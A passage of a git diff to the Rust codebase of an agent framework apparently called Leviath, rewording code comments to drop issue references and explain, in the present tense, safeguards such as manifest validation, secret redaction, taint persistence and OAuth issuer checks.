-/// stage written to produce an output ran normally and never asked for one.
-/// Region kinds have always rejected an unknown value; modes now match.
+/// A misspelled mode must not fold into an autonomous stage: a stage written
+/// to produce an output would run normally and never ask for one. Region
+/// kinds reject an unknown value for the same reason.
 #[test]
 fn parse_manifest_rejects_an_unknown_stage_mode() {
     let toml = r#"
@@ -3646,8 +3646,9 @@ provider = "anthropic"
 model = "claude-sonnet-5"
 request_timeout_secs = -5
 "#;
-    // A negative timeout used to be dropped without a word, so the stage ran
-    // on the default while the file said otherwise. It fails the load now.
+    // A negative timeout fails the load rather than being dropped without a
+    // word, which would run the stage on the default while the file said
+    // otherwise.
     let err = parse_manifest(toml).unwrap_err().to_string();
     assert!(
         err.contains("stage 'main': model: request_timeout_secs must not be negative (got -5)"),
@@ -3941,10 +3942,10 @@ compact_count = { kind = "sliding_window", max_items = 20, max_tokens = 3000, st
 
 #[test]
 fn parse_manifest_tool_routing_override_non_string_value_is_rejected() {
-    // This asserted the opposite until #361: a non-string value was skipped,
-    // so `write_file` kept neither the region named here nor any cap, and the
-    // manifest still parsed. Silently discarding the line an author wrote is
-    // the failure, not the recovery.
+    // Skipping a non-string value would leave `write_file` with neither the
+    // region named here nor any cap, and the manifest would still parse.
+    // Silently discarding the line an author wrote is the failure, not the
+    // recovery.
     let toml = r#"
 [agent]
 name = "routing-nonstring"
@@ -4101,8 +4102,7 @@ kind = "vm"
     assert!(err.contains("unknown kind 'vm'"), "got: {err}");
 }
 /// Per-tool result ceilings parse, spelled like the region overrides beside
-/// them. Without this the table is accepted and ignored, which is the shape of
-/// bug #338 was.
+/// them. Without this the table is accepted and ignored.
 #[test]
 fn parse_manifest_reads_per_tool_result_ceilings() {
     let toml = r#"
@@ -4133,11 +4133,10 @@ read_file = 20000
 
 /// A non-integer ceiling fails the manifest.
 ///
-/// This test used to assert the opposite - that the entry was skipped and the
-/// rest of the table survived - on the grounds that it matched how the region
-/// overrides beside it treated a non-string. Both were wrong for the same
-/// reason (#361, #362): the author wrote a ceiling, no ceiling was applied, and
-/// nothing said so.
+/// Skipping the entry and keeping the rest of the table would match how the
+/// region overrides beside it treat a non-string, and both readings are wrong
+/// for the same reason: the author wrote a ceiling, no ceiling would be
+/// applied, and nothing would say so.
 #[test]
 fn parse_manifest_rejects_a_non_integer_per_tool_ceiling() {
     let toml = r#"
@@ -4161,14 +4160,14 @@ grep = 500
 
 // ─── Values that quietly became a default ────────────────────────────────────
 //
-// Each of these parsed clean and resolved to something the author did not
+// Each of these would parse clean and resolve to something the author did not
 // write. Same class as the unknown keys below: a line that does nothing and
-// says nothing. The policy one is the sharp one - it resolved *looser* than
+// says nothing. The policy one is the sharp one - it resolves *looser* than
 // what was asked for.
 
-/// A misspelled `deny` used to resolve to `ask`, which is the more permissive
-/// of the two: approvable by a session grant or `--yolo`. The author wrote a
-/// refusal and got a prompt.
+/// A misspelled `deny` must not resolve to `ask`, the more permissive of the
+/// two: approvable by a session grant or `--yolo`. The author wrote a refusal
+/// and would get a prompt.
 #[test]
 fn parse_manifest_rejects_a_misspelled_stage_tool_policy() {
     let toml = r#"
@@ -4319,10 +4318,10 @@ notes = {{ kind = "sliding_window", max_items = 20, strategy = "{strategy}" }}
     }
 }
 
-// ─── Keys that do not exist (#362) ───────────────────────────────────────────
+// ─── Keys that do not exist ──────────────────────────────────────────────────
 //
-// Every one of these parsed clean before, which is what made a typo in any
-// 0.3.2 feature indistinguishable from a working config.
+// Every one of these would parse clean, which is what makes a typo in the
+// feature indistinguishable from a working config.
 
 /// The smallest manifest with a `bulk` region and one stage, for the key tests.
 fn keys_fixture(stage_extra: &str) -> String {
@@ -4356,9 +4355,9 @@ fn parse_manifest_rejects_an_unknown_stage_key() {
     assert!(err.contains("system_prompt"), "lists what is valid: {err}");
 }
 
-/// The reporter's case: a stage narrows its window by listing what it wants,
-/// so there is no `hidden` key - and guessing one used to mean the stage
-/// carried the region it meant to drop, at full cost, silently.
+/// A stage narrows its window by listing what it wants, so there is no
+/// `hidden` key - and guessing one leaves the stage carrying the region it
+/// meant to drop, at full cost, silently.
 #[test]
 fn parse_manifest_rejects_an_unknown_context_key() {
     let err = parse_manifest(&keys_fixture("[stages.work.context]\nhidden = [\"bulk\"]"))
@@ -4409,7 +4408,7 @@ fn parse_manifest_reads_a_stage_description() {
     );
 }
 
-// ─── Region names that match nothing (#362) ──────────────────────────────────
+// ─── Region names that match nothing ─────────────────────────────────────────
 
 #[test]
 fn validate_rejects_a_routing_override_naming_no_region() {
@@ -4452,7 +4451,7 @@ fn validate_allows_a_gate_on_a_region_declared_by_another_stage() {
     // A gate is evaluated by the runtime against the region's contents, not by
     // the model reading it, so a region this stage does not render is still a
     // sound thing to gate on. Routing is the opposite case and is checked
-    // per-stage; see the #370 tests.
+    // per-stage; see the routing tests.
     let toml = r#"
 [agent]
 name = "keys"
@@ -4529,9 +4528,9 @@ fn validate_allows_the_auto_added_regions() {
 
 /// The `{ region, max_result_tokens }` shape routes *and* caps.
 ///
-/// The reachable spelling of #361: this parsed clean and did nothing, and the
-/// tool lost its region as well as its cap because the entry fell through the
-/// string-only match arm entirely.
+/// Without it the entry falls through the string-only match arm entirely: it
+/// parses clean, does nothing, and the tool loses its region as well as its
+/// cap.
 #[test]
 fn parse_manifest_reads_a_tool_override_table() {
     let toml = r#"
@@ -4832,8 +4831,8 @@ mode = "autonomous"
 ///
 /// The key exists because `region` reads as though it says this and does not:
 /// it is one of several *alternative* ways to satisfy `require_modifications`,
-/// so a stage that wrote any file at all satisfied it with the named region
-/// still empty (#371).
+/// so a stage that wrote any file at all satisfies it with the named region
+/// still empty.
 #[test]
 fn parse_manifest_reads_a_required_regions_gate() {
     let toml = r#"
@@ -4918,7 +4917,7 @@ on_unavailable = "explode"
     );
 }
 
-// ─── Routing into a region the stage cannot see (#370) ───────────────────────
+// ─── Routing into a region the stage cannot see ──────────────────────────────
 
 /// The reported shape: a stage scopes its context and routes a tool into a
 /// region it left out. The result is written where the stage cannot read it,
@@ -5070,7 +5069,7 @@ read_file = "codebase"
         .expect("routing into a declared region is fine");
 }
 
-// ─── Regions an edge transform must not paraphrase (#369) ────────────────────
+// ─── Regions an edge transform must not paraphrase ───────────────────────────
 
 /// `summarizable = false` parses, and the default is on.
 ///
@@ -5289,7 +5288,7 @@ fn a_region_definition_without_the_field_deserializes_as_summarizable() {
 /// Pessimistic because a provider caches by prefix: a block that moves
 /// invalidates everything behind it, so a region nobody has classified must be
 /// assumed to move and sorted late. An optimistic default is how inferring
-/// stability from the region's kind went wrong (issue #474).
+/// stability from the region's kind went wrong.
 #[test]
 fn parse_manifest_reads_region_volatility() {
     let toml = r#"

--- a/crates/leviath-core/src/output.rs
+++ b/crates/leviath-core/src/output.rs
@@ -293,9 +293,9 @@ pub fn resolve_output_spec(
 ///
 /// A constrained spec closes with a precedence sentence, because without one
 /// this text and the stage's own system prompt are two peer instructions and
-/// which wins is model-dependent (issue #282: a stage prompt saying "lead with
-/// the diagnosis" beat `--output-instructions "reply with only the integer"` on
-/// some models and lost on others). By the time this runs, [`resolve_output_spec`]
+/// which wins is model-dependent: a stage prompt saying "lead with the
+/// diagnosis" beats `--output-instructions "reply with only the integer"` on
+/// some models and loses on others. By the time this runs, [`resolve_output_spec`]
 /// has already picked one winner per field - a caller's flag replaces the
 /// blueprint's line rather than joining it - so there is exactly one shape here
 /// and it is the one that should govern. The sentence is scoped to presentation
@@ -568,9 +568,9 @@ mod tests {
         assert!(described.contains("{\"root\": {}}"));
     }
 
-    /// Issue #282. Without this the spec and the stage's own system prompt are
-    /// two peer instructions, and a strongly-shaped stage prompt wins on some
-    /// models and loses on others.
+    /// Without this the spec and the stage's own system prompt are two peer
+    /// instructions, and a strongly-shaped stage prompt wins on some models
+    /// and loses on others.
     #[test]
     fn a_constrained_spec_says_it_outranks_the_stage_prompt() {
         let described = describe_spec(&OutputSpec {

--- a/crates/leviath-core/src/region/evict.rs
+++ b/crates/leviath-core/src/region/evict.rs
@@ -77,11 +77,11 @@ impl Region {
     /// Enforce the SlidingWindow max_items limit by removing oldest entries.
     ///
     /// Behaviour depends on the configured [`EvictionStrategy`]:
-    /// - **PerItem** – evict one turn group at a time (original behaviour).
-    /// - **Bulk** – only evict when `len > max_items + overflow`, then evict
+    /// - **PerItem** - evict one turn group at a time; the default.
+    /// - **Bulk** - only evict when `len > max_items + overflow`, then evict
     ///   down to `max_items`. Between bulk evictions the prefix is stable,
     ///   which preserves Anthropic prompt-cache keys.
-    /// - **Compact** – set `needs_message_compaction` when `len > max_items + compact_count`.
+    /// - **Compact** - set `needs_message_compaction` when `len > max_items + compact_count`.
     ///   If the runtime hasn't compacted and `len > max_items + compact_count * 2`,
     ///   fall back to bulk eviction to prevent unbounded growth.
     pub(super) fn enforce_sliding_window(&mut self) {

--- a/crates/leviath-core/src/region/mod.rs
+++ b/crates/leviath-core/src/region/mod.rs
@@ -431,7 +431,7 @@ pub struct Region {
     ///
     /// Carried from the region's declaration so the transform can consult it
     /// without the layout: `transform = "compact"` summarizes by region *kind*,
-    /// and kind cannot tell a transcript from a table of results (#369).
+    /// and kind cannot tell a transcript from a table of results.
     #[serde(default = "crate::default_true")]
     pub summarizable: bool,
 
@@ -3321,8 +3321,8 @@ mod tests {
         assert_eq!(region.current_tokens, 0);
     }
 
-    /// Keys used to be a HashMap-only idea at the tool layer. The region API
-    /// never cared, so an entry on any kind can carry one - which is what makes
+    /// Keys read as a HashMap-only idea at the tool layer, but the region API
+    /// does not care: an entry on any kind can carry one, which is what makes
     /// `context_delete` work on a sources region.
     #[test]
     fn a_keyed_entry_can_be_added_to_any_region_kind_and_found_again() {
@@ -3491,9 +3491,9 @@ mod tests {
         );
     }
 
-    /// A `max_items` of `usize::MAX` is what a negative manifest value used to
-    /// resolve to. The bulk-eviction check added `overflow` to it on the first
-    /// write and aborted the daemon mid-run.
+    /// A `max_items` of `usize::MAX` is what a saturating manifest value
+    /// resolves to. The bulk-eviction check adds `overflow` to it on the first
+    /// write, which must not overflow and abort the daemon mid-run.
     #[test]
     fn a_saturated_window_does_not_abort_on_its_first_write() {
         let mut region = Region::new(

--- a/crates/leviath-core/src/region/policy.rs
+++ b/crates/leviath-core/src/region/policy.rs
@@ -101,8 +101,8 @@ pub enum Admission {
 /// is an ordinary move, and tool routing sends read results straight into one.
 /// A compact-history region sounds settled and gains an entry every time
 /// compaction fires. Inferring stability from the kind put churn at the front of
-/// the prefix and cost a measured 456,860 cache-write tokens against zero reads
-/// (issue #474).
+/// the prefix and cost a measured 456,860 cache-write tokens against zero
+/// reads.
 ///
 /// So the blueprint says. The author knows whether a region is set once at spawn
 /// or written every turn, and nothing else does.

--- a/crates/leviath-core/src/run_archive.rs
+++ b/crates/leviath-core/src/run_archive.rs
@@ -2692,9 +2692,9 @@ mod tests {
 
     /// Replaying a journal has to land on exactly the state the run was in.
     ///
-    /// Issue #455 reports evictable regions drifting - a folded `logs` region
-    /// holding entries the live agent had already lost, and elsewhere fewer
-    /// than it held. This walks a region through the mutations a temporary
+    /// Evictable regions are where a replay drifts: a folded `logs` region
+    /// holding entries the live agent had already lost, or fewer than it
+    /// held. This walks a region through the mutations a temporary
     /// region actually performs (append, evict-oldest, evict-and-append in one
     /// step, clear) and checks the digest -> delta -> apply chain reproduces
     /// every intermediate state exactly.
@@ -2807,10 +2807,10 @@ mod tests {
     }
 
     /// The forward-compatibility guarantee, and the reason it is worth having:
-    /// adding a record kind used to truncate the journal for every older
-    /// reader. The lenient reader stopped at the first unknown record and
-    /// returned the prefix, so a build predating `InferenceUsage` would have
-    /// read a 0.3.10 journal as "header, then nothing" - with no error.
+    /// a reader that stopped at the first unknown record and returned the
+    /// prefix would truncate the journal for every older reader, so a build
+    /// predating `InferenceUsage` would read a 0.3.10 journal as "header, then
+    /// nothing" - with no error.
     #[test]
     fn an_unknown_record_kind_is_stepped_over_not_treated_as_the_end() {
         let (buf, _) = archive_with_an_unknown_record();

--- a/crates/leviath-core/src/run_meta.rs
+++ b/crates/leviath-core/src/run_meta.rs
@@ -53,8 +53,8 @@ impl RunStatus {
     /// Here rather than left to each caller because a status reaches a client
     /// three ways - serialized inside a run, rendered into a `status` string by
     /// a route that builds its own response shape, and forwarded off the
-    /// engine's event stream - and those used to be three different spellings
-    /// of the same state. [`Display`](std::fmt::Display) is PascalCase and is
+    /// engine's event stream - and all three have to spell one state one way.
+    /// [`Display`](std::fmt::Display) is PascalCase and is
     /// for a person reading a terminal; this is for a client matching on it.
     pub fn wire(&self) -> &'static str {
         match self {
@@ -90,11 +90,10 @@ impl std::fmt::Display for RunStatus {
 /// `WaitingInput` alone is several unrelated situations wearing one word, and
 /// they call for opposite responses: a fan-out parent whose workers are
 /// churning is healthy and needs nothing, while a run parked on a
-/// tool-approval prompt is stopped dead until a person answers it. Issue #184
-/// is what happens when the two are indistinguishable - an operator reading
-/// `waiting` across a factory concluded it had stalled and started killing
-/// healthy runs. Issue #431 is the same conflation reaching every client that
-/// reads `meta.json`.
+/// tool-approval prompt is stopped dead until a person answers it. With the
+/// two indistinguishable, an operator reading `waiting` across a factory
+/// concludes it has stalled and starts killing healthy runs, and every client
+/// that reads `meta.json` is left guessing the same way.
 ///
 /// Derived on demand from markers the engine already sets, by
 /// [`wait_reason_from`]; nothing tracks it separately, so it cannot fall out of
@@ -139,10 +138,10 @@ pub enum WaitReason {
     /// can go on: a provider it needs is not configured, a key was rejected,
     /// an account is out of credits.
     ///
-    /// These used to end the run. They are all deterministic and all outside
-    /// the run's control, so ending it threw away everything it had done to
-    /// punish a person for a typo in `config.toml`. The run holds its place
-    /// instead, and `lev resume` picks it up once the machine is fixed.
+    /// These are all deterministic and all outside the run's control, so
+    /// ending the run would throw away everything it had done to punish a
+    /// person for a typo in `config.toml`. The run holds its place instead,
+    /// and `lev resume` picks it up once the machine is fixed.
     ///
     /// The distinction that matters is not "is there a fix" but "does the fix
     /// let *this* run continue": a broken blueprint is equally deterministic
@@ -481,7 +480,7 @@ pub struct RunMeta {
     ///
     /// `None` is the ordinary state: titling has not finished yet, or was never
     /// asked for. `Some` means it ran and could not produce a name, which is
-    /// the case a reader could not previously distinguish from either.
+    /// otherwise indistinguishable from either.
     #[serde(default)]
     pub title_error: Option<String>,
     /// Custom key-value pairs from the spawn request (API metadata).
@@ -495,8 +494,7 @@ pub struct RunMeta {
     ///
     /// Persisted, because the daemon must still be able to sign a webhook for a
     /// run it reloaded after a restart. **Never serve it** - strip it with
-    /// [`RunMeta::redacted`] before any of this struct leaves the process. See
-    /// that method for what went wrong.
+    /// [`RunMeta::redacted`] before any of this struct leaves the process.
     #[serde(default)]
     pub callback_secret: Option<String>,
     /// Links sub-agent runs to their parent run.
@@ -521,13 +519,12 @@ pub struct RunMeta {
     /// Whether the run was launched unattended (`--yolo`), so a daemon restart
     /// resumes it the way it was started.
     ///
-    /// This used to be dropped on reload, on the reasoning that forgetting a
-    /// launch override can only prompt more, never less. In practice it meant a
-    /// restart silently converted an unattended run into one parked on a prompt
-    /// nobody was watching for - the operator's own consent, given at launch,
-    /// discarded by an implementation detail they never saw. Runs written before
-    /// this field existed default to attended, so nothing is escalated
-    /// retroactively.
+    /// Persisted rather than dropped on reload. Forgetting a launch override
+    /// only ever prompts more, never less, which is why dropping it reads as
+    /// safe; what it actually does is convert an unattended run into one
+    /// parked on a prompt nobody is watching for, discarding consent the
+    /// operator gave at launch. Runs written before this field existed default
+    /// to attended, so nothing is escalated retroactively.
     #[serde(default)]
     pub yolo: bool,
     /// How much of the blueprint's `[read_paths]` the config granted, as
@@ -570,10 +567,10 @@ pub struct RunMeta {
     ///
     /// Distinct from `model`, which is what the entry stage *resolved to* and
     /// is recorded whether or not anything was overridden. A daemon restart
-    /// rebuilds the run's spawn arguments from this file, and it used to hand
-    /// `model` back as the override: a run launched with no `--model` at all
-    /// came back with every stage pinned to its first stage's provider and
-    /// model, and its failover list gone. This field is what was actually
+    /// rebuilds the run's spawn arguments from this file, and must hand back
+    /// this field rather than `model`: handing back `model` pins every stage
+    /// of a run launched with no `--model` to its first stage's provider and
+    /// model, and loses its failover list. This field is what was actually
     /// asked for, so a reload asks for the same thing - and for a run that
     /// asked for nothing, resolves each stage afresh, as the launch did.
     ///
@@ -627,8 +624,8 @@ pub struct RunFlags {
     /// Recorded because "modified no files" only diagnoses an agent that was
     /// supposed to modify files. A router that spawns sub-agents, or an agent
     /// whose answer is its text, would otherwise report itself empty on every
-    /// successful run - which is what happened in issue #192. The framework has
-    /// no basis to judge such a run, so it says nothing rather than accusing.
+    /// successful run. The framework has no basis to judge such a run, so it
+    /// says nothing rather than accusing.
     ///
     /// This mirrors the escape the runtime's `gate_blocks` already applies per
     /// stage: a `require_modifications` gate on a stage that advertises no
@@ -673,7 +670,7 @@ pub struct RunFlags {
     /// proceeds with a log line, which nothing downstream reads: a run whose
     /// agent wrote its plan and a run where we asked twice and moved on both
     /// finished `complete`, with the second silently missing the artifact every
-    /// later stage's prompt says to work from (#371). Names rather than a count
+    /// later stage's prompt says to work from. Names rather than a count
     /// because knowing *which* region was abandoned is what makes it
     /// actionable, and a run cannot abandon many.
     ///
@@ -710,12 +707,11 @@ pub struct RunFlags {
     /// fan-out because the blueprint declared no `error` and no `dead_end`
     /// escape from the stage.
     ///
-    /// A split that cannot be parsed used to end the run outright, which threw
-    /// away everything the parent had already done - a `deep-researcher` run
-    /// died that way with its workers finished and three stages still pending.
-    /// It now always moves on, and this is what says the fan-out it moved on
-    /// from produced nothing. Non-zero means the merge stage worked from less
-    /// than it was meant to.
+    /// Ending the run on a split that cannot be parsed throws away everything
+    /// the parent has already done, workers finished and later stages still
+    /// pending. The stage moves on instead, and this is what says the fan-out
+    /// it moved on from produced nothing. Non-zero means the merge stage
+    /// worked from less than it was meant to.
     #[serde(default)]
     pub splits_degraded: usize,
 
@@ -755,11 +751,11 @@ impl RunMeta {
     /// This run's metadata with the webhook signing secret removed, for anything
     /// that leaves the process.
     ///
-    /// `GET /api/agents`, `/api/agents/{id}` and `/api/agents/{id}/children` all
-    /// serialized `RunMeta` whole, so any holder of the API token could read
-    /// every run's `callback_secret` - the key that authenticates Leviath's
-    /// webhooks to their receivers. Mirrors the `RedactedConfig` pattern the
-    /// `/api/config` handler already uses correctly.
+    /// `GET /api/agents`, `/api/agents/{id}` and `/api/agents/{id}/children`
+    /// all serialize `RunMeta` whole, so without this any holder of the API
+    /// token reads every run's `callback_secret` - the key that authenticates
+    /// Leviath's webhooks to their receivers. Mirrors the `RedactedConfig`
+    /// pattern the `/api/config` handler uses.
     ///
     /// Returns an owned copy rather than mutating in place so a caller cannot
     /// accidentally redact the record the daemon still needs for signing.
@@ -864,8 +860,8 @@ impl RunMeta {
     /// was happening on its behalf. See the sibling spans on [`Self::age_secs`].
     ///
     /// A run written before the clock existed carries no spans at all, so it
-    /// falls back to the wall-clock span it used to report - a finished run that
-    /// claims to have taken no time is the worse answer of the two.
+    /// falls back to the wall-clock span - a finished run that claims to have
+    /// taken no time is the worse answer of the two.
     pub fn active_runtime_secs(&self, now: i64) -> u64 {
         match self.active {
             Some(clock) => clock.total_secs(now),
@@ -1083,8 +1079,8 @@ mod tests {
 
     #[test]
     fn active_runtime_secs_falls_back_to_the_wall_clock_span_when_unrecorded() {
-        // A run written by a build that kept no clock: the span it used to
-        // report is a better answer than "this run took no time".
+        // A run written by a build that kept no clock: the wall-clock span is
+        // a better answer than "this run took no time".
         let mut meta = sample_meta();
         meta.started_at = 1_000;
         meta.updated_at = 1_600;
@@ -1653,7 +1649,7 @@ mod tests {
 
     #[test]
     fn run_meta_flags_default_for_older_files() {
-        // meta.json written before #107 has no `flags` key at all.
+        // A meta.json written before `flags` existed has no such key at all.
         let mut meta = RunMeta::new(
             "r".to_string(),
             "a".to_string(),

--- a/crates/leviath-core/src/run_meta/stage_ledger.rs
+++ b/crates/leviath-core/src/run_meta/stage_ledger.rs
@@ -34,13 +34,12 @@ pub enum StageRunStatus {
     /// The run finished without ever entering this stage.
     ///
     /// Distinct from [`Pending`](Self::Pending), which means "not yet" while a
-    /// run is live, and from [`Complete`](Self::Complete), which these used to
-    /// be recorded as: the ledger marked every stage positioned before the
-    /// cursor complete, and a graph does not visit its stages in index order,
-    /// so an error-recovery branch nothing reached was filed as having run
-    /// (#372). Its `region_tokens` is empty because nothing ever wrote it,
-    /// which made the next real stage look like it had written every region
-    /// from zero.
+    /// run is live, and from [`Complete`](Self::Complete): a graph does not
+    /// visit its stages in index order, so marking every stage positioned
+    /// before the cursor complete files an error-recovery branch nothing
+    /// reached as having run. Its `region_tokens` is empty because nothing
+    /// ever wrote it, which makes the next real stage look like it wrote
+    /// every region from zero.
     Skipped,
 }
 
@@ -212,7 +211,7 @@ pub struct StageRecord {
     /// Position cannot answer this. A graph blueprint reaches its stages in
     /// whatever order its edges describe, so "index below the cursor" includes
     /// every branch the run went past without taking - and reading it as
-    /// "finished" is what filed never-entered stages as `Complete` (#372).
+    /// "finished" files never-entered stages as `Complete`.
     /// Sticky once set, so a stage the run has left and may re-enter stays
     /// entered.
     #[serde(default)]
@@ -238,11 +237,10 @@ pub struct StageRecord {
     /// `None` means *unknown*, never free, exactly as on
     /// [`RunMeta::cost_usd`]: some call was served by a model with no reported
     /// cost and no known rates, so any total would understate by an unknown
-    /// amount. The tokens beside it were always here; this is the one
-    /// conversion that has a rule behind it, and it belongs on the side that
-    /// owns the rule. A console multiplying these tokens by a rate card of its
-    /// own would produce a fourth answer that disagrees with the other three
-    /// (#630).
+    /// amount. Pricing is the one conversion with a rule behind it, and it
+    /// belongs on the side that owns the rule: a console multiplying these
+    /// tokens by a rate card of its own would produce a fourth answer that
+    /// disagrees with the other three.
     ///
     /// Accumulated across revisits, like the token counts. For the split by
     /// visit, read [`visits`](Self::visits).

--- a/crates/leviath-core/src/sync.rs
+++ b/crates/leviath-core/src/sync.rs
@@ -1,11 +1,11 @@
 //! Taking a lock without a panic path.
 //!
 //! `std::sync::Mutex::lock` returns a `Result` because a thread that panics
-//! while holding the guard *poisons* it, and every later locker is told so. The
-//! workspace used to answer that with `.expect("...")` at 21 sites, which turns
-//! one unrelated panic into a daemon-wide cascade: the first failure poisons a
-//! telemetry mutex, and the next observation - on a healthy run, in a different
-//! subsystem - aborts the process.
+//! while holding the guard *poisons* it, and every later locker is told so.
+//! Answering that with `.expect("...")` turns one unrelated panic into a
+//! daemon-wide cascade: the first failure poisons a telemetry mutex, and the
+//! next observation - on a healthy run, in a different subsystem - aborts the
+//! process.
 //!
 //! # Why recovering is sound here, and would not be everywhere
 //!

--- a/crates/leviath-core/src/taint.rs
+++ b/crates/leviath-core/src/taint.rs
@@ -593,9 +593,9 @@ pub fn classified_builtin(tool_name: &str) -> Option<ToolClassification> {
 mod tests {
     use super::*;
 
-    /// Taint was not persisted at all, so every restart, resume or page-in
-    /// brought a region back `Public` while the gate reported itself armed -
-    /// silently unblocking outbound tools it had been blocking.
+    /// Without persisted taint, every restart, resume or page-in brings a
+    /// region back `Public` while the gate reports itself armed, silently
+    /// unblocking outbound tools it should be blocking.
     #[test]
     fn taint_rebuilds_from_persisted_entries_at_the_highest_level() {
         let restored = RegionTaint::from_entry_taints(vec![

--- a/crates/leviath-core/src/telemetry.rs
+++ b/crates/leviath-core/src/telemetry.rs
@@ -202,8 +202,8 @@ impl TelemetryEvent {
 /// Deliberately not a [`TelemetryEvent`]: every variant of that enum belongs to
 /// one run, and this belongs to none of them. The distinction is the point. A
 /// daemon whose lanes are full and whose runs have all stopped moving emits no
-/// per-run telemetry at all, precisely because nothing is happening, so the
-/// silence that issue #191 reported was indistinguishable from an idle night.
+/// per-run telemetry at all, precisely because nothing is happening, so that
+/// silence is indistinguishable from an idle night without this.
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
 pub struct LaneHealth {
     /// Agents doing work, or ready to.
@@ -229,7 +229,7 @@ pub struct LaneHealth {
 ///
 /// Daemon-wide for the same reason as `LaneHealth`: a provider out of credits
 /// belongs to no single run, and the runs it kills emit nothing useful because
-/// they die before doing anything (issue #201).
+/// they die before doing anything.
 ///
 /// `reason` is the label rather than the runtime's own enum: this crate sits
 /// below `leviath-providers`, so the type that names it is not in scope here.

--- a/crates/leviath-core/src/text.rs
+++ b/crates/leviath-core/src/text.rs
@@ -49,7 +49,7 @@ pub fn floor_char_boundary(s: &str, max: usize) -> usize {
 /// That totality is the point. A scanner walking byte offsets through text it
 /// did not author - HTML from a fetch, a model's fenced output, an SSE frame -
 /// cannot be read closely enough to prove every offset correct, and the failure
-/// mode for getting one wrong used to be aborting the daemon.
+/// mode for getting one wrong is a panic that takes the daemon with it.
 pub fn substring(s: &str, start: usize, end: usize) -> &str {
     let end = floor_char_boundary(s, end);
     let start = floor_char_boundary(s, start.min(end));
@@ -188,7 +188,8 @@ mod snippet_tests {
     }
 
     /// The reason this lives here rather than at a call site: a byte offset
-    /// landing inside a multi-byte character used to abort the daemon.
+    /// landing inside a multi-byte character panics a plain slice, and that
+    /// panic takes the daemon with it.
     #[test]
     fn multi_byte_characters_are_never_split() {
         let hay = "aaa🇯🇵🎉bbb needle ccc🚀ddd";
@@ -289,7 +290,7 @@ mod tests {
     fn truncate_at_boundary_never_splits_a_character() {
         assert_eq!(truncate_at_boundary("abc", 99), "abc");
         assert_eq!(truncate_at_boundary("abcdef", 3), "abc");
-        // The exact shape that panicked in issues #109/#115.
+        // The exact shape that panics a plain `&s[..n]`.
         assert_eq!(truncate_at_boundary("abc🎉def", 5), "abc");
         assert_eq!(truncate_at_boundary("🎉abc", 2), "");
         assert_eq!(truncate_at_boundary("", 5), "");

--- a/crates/leviath-core/src/write_limits.rs
+++ b/crates/leviath-core/src/write_limits.rs
@@ -1,15 +1,14 @@
 //! Deciding whether an agent may write, and how much.
 //!
 //! Three questions, deliberately answered separately because they are not the
-//! same kind of thing (issue #252):
+//! same kind of thing:
 //!
 //! 1. **Will this fill the disk?** Always asked, not configurable away. A run
 //!    that filled `C:` took the machine down with it, and every other process
 //!    on it. Nobody wants that outcome, so nothing offers it.
 //! 2. **Is one call writing an absurd amount?** Off unless configured. The
-//!    reported incident was a single shell call appending in a loop until the
-//!    60-second timeout - about 14 GB - and a per-call ceiling is what would
-//!    have caught it.
+//!    shape it catches is a single shell call appending in a loop until the
+//!    60-second timeout, about 14 GB.
 //! 3. **Is the whole run writing an absurd amount?** Also off unless
 //!    configured. Three calls of 12-14 GB each is the shape 2 alone misses.
 //!

--- a/crates/leviath-mcp/src/auth/metadata.rs
+++ b/crates/leviath-mcp/src/auth/metadata.rs
@@ -64,10 +64,9 @@ pub(crate) fn resource_metadata_url(www_authenticate: Option<&str>) -> Option<St
 /// `https://host/.well-known/oauth-protected-resource/mcp/`, and only a
 /// resource at the root has its document at the bare well-known path.
 ///
-/// Dropping the path instead is what made every path-hosted server 404 here
-/// whenever it did not send a `resource_metadata` hint. GitHub's MCP server is
-/// the case that surfaced it: it serves the document at the suffixed URL, and
-/// nothing at the bare one.
+/// Dropping the path instead 404s on every path-hosted server that sends no
+/// `resource_metadata` hint: GitHub's MCP server serves the document at the
+/// suffixed URL and nothing at the bare one.
 pub(crate) fn well_known_resource_url(mcp_url: &Url) -> Url {
     let mut url = mcp_url.clone();
     // A path of "/" is the root case, where the suffix would add a stray

--- a/crates/leviath-mcp/src/auth/mod.rs
+++ b/crates/leviath-mcp/src/auth/mod.rs
@@ -130,8 +130,8 @@ impl OAuthClient {
     /// Returns [`LoginOutcome::NotRequired`] when the server answers a probe
     /// carrying `headers` without demanding credentials. A server configured
     /// with its own API token is the ordinary case: there is no OAuth flow to
-    /// run, and pushing one anyway is what sent every such server into a
-    /// discovery request it does not serve.
+    /// run, and pushing one anyway sends such a server into a discovery
+    /// request it does not serve.
     ///
     /// `now` (Unix seconds) is passed in rather than read from the clock so the
     /// computed `expires_at` is deterministic under test. `reuse_client_id`
@@ -329,7 +329,7 @@ impl OAuthClient {
         // it names is then fetched by us, from inside the user's network. Bind it
         // to the MCP server's own origin: a server may point at its own metadata
         // document, which is the legitimate use, and may not point at anything
-        // else. Without this, connecting to a hostile MCP server was enough to
+        // else. Without this, connecting to a hostile MCP server is enough to
         // make Leviath fetch an arbitrary URL - cloud metadata included.
         let resource_meta_url = match hinted {
             Some(hint) => {
@@ -383,11 +383,11 @@ impl OAuthClient {
 
     /// Fetch AS metadata, trying RFC 8414 then the OpenID fallback.
     ///
-    /// The returned document is validated against `issuer` before use. RFC 8414
-    /// §3.3 requires the `issuer` in the metadata to match the one that was
-    /// requested, and this never checked - so a hostile
-    /// `authorization_servers[0]` in the resource document could redirect the
-    /// entire flow to an attacker's authorization server and harvest the code.
+    /// The returned document is validated against `issuer` before use: RFC 8414
+    /// §3.3 requires the metadata's `issuer` to match the one that was
+    /// requested. Without that check a hostile `authorization_servers[0]` in
+    /// the resource document redirects the whole flow to an attacker's
+    /// authorization server and harvests the code.
     async fn fetch_auth_server_metadata(&self, issuer: &str) -> anyhow::Result<AuthServerMetadata> {
         let mut last_err = None;
         // Parsed once here and passed down: `auth_server_metadata_urls` already
@@ -632,8 +632,8 @@ pub struct StoredTokenRefresher {
     store_path: std::path::PathBuf,
     /// Current Unix time; a fn so a long-lived transport stays current.
     clock: fn() -> u64,
-    /// Built once: every 401 used to construct a fresh `reqwest::Client`,
-    /// with its own connection pool, to make one token request.
+    /// Built once and reused: a client per 401 would stand up a whole
+    /// connection pool to make one token request.
     oauth: OAuthClient,
 }
 
@@ -793,10 +793,9 @@ async fn handle_callback_connection(
         return Err(anyhow::anyhow!("authorization server returned: {}", error));
     }
     match (params.get("code"), params.get("state")) {
-        // Constant-time: the state is 128 bits of fresh entropy over loopback, so
-        // a timing oracle here is theoretical - but it was the one secret
